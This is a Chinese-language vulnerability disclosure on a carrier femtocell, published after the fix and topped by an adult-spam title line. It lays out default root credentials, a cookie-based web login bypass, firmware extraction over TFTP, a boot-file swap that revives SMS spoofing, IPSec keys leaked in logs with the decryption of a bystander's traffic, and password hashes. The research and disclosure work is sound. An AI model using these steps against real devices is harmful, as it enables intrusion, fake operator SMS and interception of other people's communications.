压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

Femtocell一般安裝在用戶觸手可及的位置上，這就使得一直躲在通信機房這一天然物理安全屏障庇護下的傳統通信廠商，終于要接受天下黑客的檢 閱了。然而，傳統通信廠商在開發過程中的安全意識淡薄，導致了通信設備的安全漏洞比比皆是。近年來，BlackHat、DEFCON等安全大會上多次曝出 Femtocell的安全問題。

漏洞細節已于2015年5月21日通報相關運營商，相關廠家已經針對此漏洞對全網設備進行了緊急修復，目前漏洞已經修復完成。出于推進安全研究的考慮，現在將漏洞的細節公開。

1 板卡概覽

1.1 設備的獲得

如何獲得一臺Femtocell設備呢？

在2015年4月初，我給10086打電話，報告說屋子里的信號很差(事實的確如此)。10086說如果家里有寬帶，可以免費安裝一臺小基站。過了兩天，安裝的工程師就上門來裝了。

Femtocell設備典型的安裝位置:門面房、辦公室、健身房、歌劇院辦公司

最大發射功率在30dBm，只有1W。而一般的GSM基站功率大約在20W左右。

Femtocell安裝之后，效果的確非常好。原來室內GSM信號只有一格，偶爾會”無信號”，屋里的手機經常打不通。Femtocell開機之后，信號頓時變成滿格，但制式是GPRS。大家家里沒信號的話，可以打電話給10086申請，而且申請也是免費的。而且后續的話，運營商已經在準備3G和 4G的Femtocell了。比需要架室外和室內天線的直放站方案穩定很多，而且架設方便。

在2014年10月，烏云上已經有人提交了Femtocell的漏洞一枚。據記錄，在2015年1月被修復完成，漏洞公開。受這篇文章的啟發，我們繼續對Femtocell設備進行安全分析。發現了一些新的漏洞，并且舊的漏洞修復的也不徹底。

1.1 硬件組成

拆開發現里面有兩塊電路板，二者通過自定義標準的線纜相連，初步猜測線纜中至少有網絡線纜4根。

一塊是普通的WLAN AP，上面有Atheros的SoC芯片，與一般家用路由器無異。

另一塊用于射頻的板卡，主要由以下三部分組成

TI的345MHz的DSP+ARM處理器OMAPL138B
Cyclone的FPGA
RF捷變器AD9365(左下角)

 

1.2 網絡拓撲

2 WLAN 板卡滲透

2.1 root弱密碼

可以直接telnet登錄，然后就是一個擁有root權限的Linux shell了。

$?telnet?192.168.197.1
login:?root
password:?5up

順便提一句，這個密碼應該是Atheros的參考設計板PB44的默認密碼，很多廠商拿來都不改。在搜索引擎上以”5up”和”root”為關鍵詞，可以搜索到不少有趣的東西。

并且發現上面的busybox基本沒有裁剪，甚至連tcpdump功能都有。

于是，可以直接抓取到所有連上此WiFi的流量:

busybox?tcpdump?-i?br0?not?port?23

2.2 其它利用方式

/mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件，可以使用sqlitebrowser直接查看

閃燈 /mnt/flash/led_ctrl.sh [on|off]

3 RF 板卡滲透

3.1 Web 登錄繞過

訪問 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 獲得用戶名為

abmoc@24320

然后在USER.js里發現原有的登錄繞過問題沒有得到修復，于是在瀏覽器中打開Console，輸入以下腳本即可登錄:

SetCookie('role',?'marketUser');
SetCookie('username',?'abmoc@24320');?
SetCookie('levels',?[-2,?0,?1,?3,?11,?13,?15,?16]);?
document.cookie?=?"loginFlag=1;";
window.top.location?=?'main.asp?r='?+?Math.random()?+?'#index';

登錄之后，我們就擁有了與運營商派過來開站的工程師完全一樣的操作權限！

以下是一些管理界面截圖:

 

 

然而發現之前曝出的文件上傳下載的接口，以及歡迎短信下發的接口代碼已經完全被刪除了！但是真的刪除了嗎？

3.2 Boot

看起來WEB上做不成啥事情，于是在UART插座接上串口線，轉戰硬件層。

首先看到引導信息是

CPU:?TI?OMAP-L138?-?ARM926E?(ARM)
Version:?VxWorks?6.8
BSP?version:?2.0/1
Creation?date:?Sep?26?2012,?10:26:36

發現跑的操作系統是VxWorks，引導結束之后，提示輸入用戶名和密碼。暫時沒有思路，于是嘗試進入Boot模式。

在看到

Press?any?key?to?stop?auto-boot...

之時，敲擊鍵盤，進入VxWorks Boot。由于是一個陌生的環境，首先打問號看幫助。發現有幾條命令可以用。

但是ls命令只能看文件名，不能看文件內容。此外，發現還有cp和rm兩條命令可以用。面對著大把大把的文件，只能看文件名，不能看文件內容，好著急。

3.2.1 下載所有文件

VxWorks正常引導開機之后，掃描了一下端口，發現UDP/69端口打開。這個是TFTP(Trivial File Transfer Protocol)的端口。許多嵌入式設備都使用TFTP協議來傳輸固件。

于是在電腦上試圖上傳一個本地文件:

$?tftp
tftp>?connect?192.168.197.241
tftp>?put?a.txt

然后再嘗試下載，發現

tftp>?get?a.txt
xx?bytes?transfered..

說明上傳成功。重啟之后，發現文件仍然可以被tftp get到。

然后進去VxWorks Boot，發現上傳的文件在/tffs0/wlanBackup/里?？磥恚緩S商還是對tftp的操作做了一些限制，把文件上傳下載限制到了這個目錄里面。

但是，不要忘了，我們在Boot模式下，還有cp和mv和rm命令。于是，剩下的工作就是辛苦的把其它目錄的文件，一個一個地cp到wlanBackup目錄里，然后再tftp get下來。

至此，我們就可以把VxWorks系統里的所有文件都拉回到本地，進行分析。

3.2.2 修改Startup: 偽造短信重見天日

然后四處看一看文件，發現/tffs0/common/startup.txt里面寫著一行:

/tffs0/user2

十分可疑！

再調查一下/tffs0/user1目錄中，把OAM.zip解壓之后，發現就是烏云曝出有漏洞的那個版本的程序。

于是上傳一個新的startup.txt，里面寫成

/tffs0/user1

重啟引導，發現之前的 debug / 2342@WAS_ap 密碼就可以直接用了，以及文件上傳下載，以及歡迎短信的漏洞就都可以利用了。利用方式在烏云的文章上已經有詳細描述，在此不再贅述。

原來，基站廠家的工程師，在上一次全網設備更新的時候，沒有刪除有漏洞的程序，而是把新的程序放在了/tffs0/user2目錄里面，然后通過startup.txt指過去了。

下圖左側是我以中國聯通10010的身份，偽造下發的短信，注意看時間是在2015年4月20日。右側是偽造的歡迎閃信(Flash SMS)

 

這樣下發的短信，實際上是由”真基站”發送下來的，而且這種短信不需要Femtocell與核心網之間通信，核心網無從監管Femtocell下達 的歡迎短信是什么，并且可以任意修改歡迎短信的發件人和內容。歡迎短信的功能，原本只是用于提示用戶已經加入了新的小區而已，這是系統的設計漏洞。此外， 它的ARFCN和CellID等參數與真基站無異，這樣一來，試圖通過基站參數進行偽基站檢測的方案都將失效。

3.3 IPSec 分析: 捕獲用戶明文數據流量

繼續調查，發現VxWorks版卡的串口輸出中有如下字樣:

secIpAddr:111.206.50.34
seckey:combaipsec2011
secUseImsi:9999990000xxxxx
ipSecRekeyTime:80000minutes
liveness:0
comba_usim_card_auth:?use?virtual?usim?card.
mac?ok
0xc474d788?(ipiked):
ipsecStart()?done
Ipsec?Ip?:?10.37.52.240
Enc?key?inbound:9ab3eb22?2b4917e1?4a50ddae?e4e5f3ba?064494c6?f1cc6873
Enc?key?outbound:f8ac6c27?c4000a72?dd26156c?afff5c99?9ea2894e?429ef824
Auth?key?inbound:152b81aa?92456554?6f1cbb38?2f5461c8?33e2211d
Auth?key?outbound:e6af8105?b73edc29?13791638?3f8c65fc?224c0688
add?net?10.1.0.0:?netmask?255.255.0.0:?gateway?10.37.52.240
add?net?172.16.15.0:?netmask?255.255.255.0:?gateway?10.37.52.240
add?host?111.206.50.34:?gateway?192.168.197.1

上面日志里打出的

seckey:combaipsec2011

，在相關的論文中也有描述，是開發過程中，項目組為了方便調試，使用的IPSec PSK認證方式，在投入生產環境部署的時候，已經關閉了這種認證方式了。

現在IPSec使用的認證方式是EAP-AKA，基于模擬USIM卡的認證。具體細節可以參閱RFC4187。

3.3.1 認證原理

EAP-AKA的認證方式，簡單描述如下:

局端的SeGW(Security Gateway, 實際上是IPSec Server)后面跟著一個RADIUS認證服務器，里面寫了若干條認證五元組(Quintuplet)。

IMSI:?RAND,XRES,CK,IK,AUTN

認證開始時，Femtocell先上報自身的IMSI。SeGW收到認證請求后，取出與IMSI對應的一條五元組，并把這條五元組標記為已經使用。 將里面的隨機數挑戰RAND和鑒權令牌AUTN發給Femtocell。Femtocell先通過驗證AUTN，從而驗證SeGW是否是真的。驗證通過之 后，再根據Femtocell裝載的USIM卡里的Ki和OPc密鑰，以及隨機數挑戰RAND，算出一個應答RES和兩個密鑰CK和IK。然后把RES傳 回給SeGW，SeGW核對RES和存在五元組里的XRES是否一致，從而完成對手機的認證。注意，協商出來的密鑰CK和IK，在全過程中不會被傳輸，傳 輸的只是RAND和XRES以及AUTN，即使通信被竊聽，也無法獲得加密密鑰。

以上即是Femtocell與SeGW之間的認證過程。實際上，把”Femtocell”的字眼換成”手機”，”SeGW”的字眼換成”基站”，就描述了手機與基站之間的認證過程，兩種場景下的認證過程基本上是一致的。

3.3.2 抓包分析: ESP解密

首先對VxWorks建立IPSec隧道時的IKEv2(UDP 500端口)的協議抓包分析，得到它協商出的加密方式如下:

Encryption?Algorithm?:??ENCR_3DES
Integrity?Algorithm?:??AUTH_HMAC_SHA1_96
Pseudo-random?Function?(PRF)?:??PRF_HMAC_SHA1
Diffie-Hellman?Group?(D-H):?Alternate?1024-bit?MODP?group

于是，打開Wireshark，在抓到的ESP(Encapsulating Security Payload)包上面，右鍵，將上述輸出中的Enc key填寫到Wireshark的Encryption Key字段，將上述輸出中的Auth key填寫到Wireshark的Authentication Key字段中。

注意，IPSec隧道流量的兩個方向，分屬不同的 SA(Security Association) 和 SPI(Security Parameter Index)，因此需要把inbound這一組Key應用到SeGW->Femtocell方向的流量上，并且把outbound這一組Key應用 到Femtocell->SeGW方向的流量上。

上述日志打出的Key，需要改寫成形如0x9ab3eb222b4917e14a50ddaee4e5f3ba064494c6f1cc6873之后，才可以填入Wireshark中。

填寫完成之后，原來只能顯示為ESP的數據包，即被解密。

3.3.3 解密后的流量

繼續分析，發現解密后的數據包有以下幾種類型:

HNBAP:?Home?Node-B?Application?Part
RANAP:?Radio?Access?Network?Application?Part
ICMP:?Internet?Control?Message?Protocol?(就是ping啦)
RTP:?Real-time?Transport?Protocol
SCTP:?Stream?Control?Transmission?Protocol?(上面跑有SS7,7號信令)
NTP:?Network?Time?Protocol?(用于Femtocell上電校時)
GTP:?GPRS?Tunneling?Protocol?(手機的數據流量)

下圖中，可以看到以GTP形式封裝的用戶數據，里面有一個HTTP請求。

下圖中，看到Femtocell開機之后，正在使用NTP協議進行時間校準。

下圖中，可以看到Femtocell向上發起注冊請求，以及SeGW下發的注冊成功的消息。并且，LAC(Location Aera Code)也在數據報文中。

特別注意到的是，附近某個人在不知情的情況下，連上了這臺Femtocell?？梢钥吹竭@臺手機的型號是三星 GT-I9308，跑著Android 4.3系統，手機后臺通過GPRS產生的流量，被我們看的清清楚楚。

下圖中可以看出，后臺有360和QQ在上傳的一些統計信息。

下圖中可以看到，我們還捕獲到了用戶的IMSI號，并且可以通過反查來得到用戶的手機號前幾位。

用戶的語音和短信在RTP報文里。

3.3.4 潛在風險: 偽造客戶端

123456789012345567890123456789012345678901234567
123456789012345567890123456789012345678901234567
9999990000*****@strongswan.org

上述文件是/tffs0/common/imsi.cfg。 其中寫了虛擬IMSI參數: Ki和OPc密鑰，以及IMSI號。這些參數供Femtocell與通信機房里的SeGW(Security Gateway, 實際上是IPSec網關)建立安全連接。

Femtocell與SeGW之間的IPSec協議建立，需要使用真實的USIM卡，來完成基于EAP-AKA的雙向鑒權。Femtocell設備 的底部即有一個USIM卡插槽。但是廠家為了調測以及管理方便，使用了虛擬USIM卡的方案，把鑒權所需要的參數，寫在上述imsi.cfg文件中，這樣 便無需管理大量的USIM卡。

真實的USIM卡中存的也只有IMSI/Ki/OPc三個參數，因此只需要把上述三個參數寫到文件中，并在VxWorks程序中模擬3GPP中所需要的Milenage算法，即可完成相應的EAP-AKA鑒權過程。

關于Femtocell對應的SeGW，在《基于IPSec-VPN的數字證書認證技術的研究與實現》論文中有提到，使用了Radisys公司的解決方案，是刀片式計算機，搭載有Cavium公司的OCTEON處理器。

如果后續繼續對取得的VxWorks固件進行逆向分析，將有可能模擬出登錄過程，從而使用IPSec VPN撥通SeGW，從而連入Femtocell通信內網。

3.4 其它利用

3.4.1 TCP 50000 控制端口 (LMT)

這是一個由該Femtocell廠家自己編寫的telnet server。但是! 以任意用戶名和任意密碼皆可登錄。(實在無法理解…)

指令的描述位于 /tffs0/user2/OAM/software/web/web_page/webCommTab.txt

以下摘錄一部分:

OAM參數配置;SON參數配置;調試命令;ATS定標;業務參數配置;

#設備基本信息

set?DeviceInfo?:?EnabledOptions=1,AdditionalHardwareVersion="HW0001",AdditionalSoftwareVersion="ASW0001",ProvisioningCode="Comba",DeviceStatus="1",UpTime=1,FirstUseDate="1",DeviceLog="1",FtpIp="192.168.1.8";

#設備網管管理服務器參數

set?ManagementServer?:?URL="http://10.3.0.130:8081/ACS/HMSServlet",Username="admin",Password="admin",PeriodicInformEnable=1,PeriodicInformInterval=10,PeriodicInformTime="0",ParameterKey="123",ConnectionRequestUsername="admin",ConnectionRequestPassword="admin",UpgradesManaged=1;

#周期性復位

set?PeriodicReboot?:?PeriodicRebootEnable=1,PeriodicRebootTime="02:00-05:00";

…下略…

實際操作結果示例: (不要忘記命令末尾的分號)

COMBA?telnet?server?0.1
welcome?...
login?user:?a
login?pwd:?a
Login?successfully.
->?get?DeviceInfo;
CMD?:?get?DeviceInfo......[OK]
RESULT?:?ACK?000
HINT?:?get?DeviceInfo?success!
CONTENT?:?DeviceInfo
Manufacturer?=?"Comba"
ManufacturerOUI?=?"00271D"
ModelName?=?"HNB-10,A01L"
Description?=?"GSM_IB-WAS"
ProductClass?=?"GSM_N2"

…下略…

這樣任何人都可以直接通過telnet登入此界面，修改任意的通信參數了。

3.4.2 TCP 50005 端口

50005端口只允許被WLAN板卡 192.168.197.1 訪問。

簡單抓包分析發現，這是廠家自定義的一種通信協議，供WLAN板卡讀取此端口以獲得RF板卡的工作狀態。并且工作狀態在WLAN板卡的/tmp/目錄下有對應的文件記錄。

3.4.3 密碼

VxWorks板卡網頁的的登錄密碼位于 /tffs0/user2/OAM/software/web/web_page.xml 里

abmoc@24320?e29c21956e290b8e76b22bec66f4e8c7
comba?e10adc3949ba59abbe56e057f20f883e?(即123456)
admin?e10adc3949ba59abbe56e057f20f883e?(即123456)
Comba_IB-WAS?1ebe493b3a9ba02373190df07d031964?(即2342@WAS_ap)

3.4.4 基站的通信網參數

位于 /tffs0/user1/oam.db，依然是sqlite數據庫。

此外，我們在Femtocell的網頁Javascript中，也發現了針對TD-SCDMA、4G等版本的適配代碼。通過其它渠道也得知，運營商正在積極地推進4G Femtocell的部署。

后記

由于通信行業封閉而不透明的傳統，運營商網絡如GPRS/3G/LTE中所潛在的安全風險，一直沒有得到充分的暴露。近年來GSM”偽基站”暴露出 的通信安全問題，已經逐漸讓大家對通信安全有了一些擔憂。隨著移動互聯網業務的迅猛發展，特別是無線支付業務發展，運營商網絡中所承載的數據流量對于黑客 越來越有價值。

希望通信設備廠商能夠勇敢地面對互聯網時代的安全浪潮，從開發流程中開始重視安全，多借鑒互聯網行業中所使用的成熟的安全審計工作流程和策略，避免因設備漏洞造成更大的危害。